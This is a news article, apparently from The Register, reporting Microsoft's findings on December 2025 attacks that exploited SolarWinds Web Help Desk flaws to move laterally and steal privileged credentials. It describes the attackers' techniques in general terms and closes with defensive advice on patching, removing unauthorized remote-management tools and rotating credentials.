Article Details

Someone's attacking SolarWinds WHD to steal high‑privilege credentials - but we don't know who or how. So many CVEs, so little time. Digital intruders exploited buggy SolarWinds Web Help Desk (WHD) instances in December to break into victims' IT environments, move laterally, and steal high-privilege credentials, according to Microsoft researchers. But one mystery remains: which flaw in the popular help-desk ticketing app did the unknown miscreants abuse in these attacks? "We have not yet confirmed whether the attacks are related to the most recent set of WHD vulnerabilities disclosed on January 28, 2026, such as CVE-2025-40551 and CVE-2025-40536 or stem from previously disclosed vulnerabilities like CVE-2025-26399," the threat hunters said in a Friday blog. "Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold." Redmond's team said it continues to investigate the intrusions and will update the analysis as they learn more. The researchers declined to answer The Register's inquiries about these attacks, including how many organizations' WHD instances had been compromised. SolarWinds did not immediately respond to our request for comment. CVE-2025-40551 is a critical untrusted deserialization flaw that can lead to remote code execution, allowing a remote, unauthenticated attacker to execute OS commands on the affected system. It earned a 9.8 CVSS rating, and about a week after the vendor issued a security advisory urging customers to patch the vulnerability, the US Cybersecurity and Infrastructure Security Agency added the bug to its Known Exploited Vulnerabilities catalog and gave federal agencies just three days to patch the security hole. At the same time, SolarWinds patched CVE-2025-40536, a high-severity (8.1 CVSS) security control bypass vulnerability that can allow an unauthenticated attacker to gain access to certain restricted functionality. This one hasn't yet appeared on CISA's exploited bugs catalog. Meanwhile, CVE-2025-26399 is a critical, 9.8-severity flaw that also allows remote, unauthenticated attackers to run commands on a host machine. SolarWinds attempted to patch this one three times before the fix finally worked. "This vulnerability is a patch bypass of CVE-2024-28988, which in turn is a patch bypass of CVE-2024-28986," SolarWinds noted in its disclosure. Criminals exploited both of those earlier vulnerabilities. While Microsoft hasn't yet determined which of these vulnerabilities the intruders used in the December attacks, the security sleuths say that after exploiting one of the SolarWinds WHD bugs, the compromised devices spawned PowerShell to abuse the Background Intelligent Transfer Service (BITS) for payload download and execution. BITS is a built-in Windows operating system feature used to manage file transfers between machines. Like several legitimate Microsoft features, attackers have found a way to use BITS for mischief – in this case, downloading and executing malware. It's an example of a technique defenders call "living off the land," which involves using legitimate administrative tools that are already installed on victims' machines for malicious purposes, rather than using custom malware, which is more likely to be detected and blocked by antivirus software. Microsoft noted that on "several hosts," the attackers also downloaded and installed Zoho ManageEngine, a legitimate remote monitoring and management (RMM) product, to provide long-term, remote control of the compromised system. Then, using this remote management tool, the intruders enumerated sensitive domain users and groups, including Domain Admins, and established reverse SSH and RDP access for persistence.  "In some environments, Microsoft Defender also observed and raised alerts flagging attacker behavior on creating a scheduled task to launch a QEMU virtual machine under the SYSTEM account at startup, effectively hiding malicious activity within a virtualized environment while exposing SSH access via port forwarding," the researchers wrote. Additionally, in some cases, the attackers used DLL sideloading to access Windows Local Security Authority Subsystem Service (LSASS) memory and steal credentials. "In at least one case, activity escalated to DCSync from the original access host, indicating use of high‑privilege credentials to request password data from a domain controller," according to the blog. If you haven't already: apply the WHD patches now, and remove public access to admin paths.  Security teams should also scan for and evict unauthorized RMM tools, specifically ManageEngine RMM artifacts such as ToolsIQ.exe, Microsoft suggests. It's also a good idea to rotate credentials – Redmond recommends starting with service and admin accounts reachable from WHD – and isolate any known compromised hosts.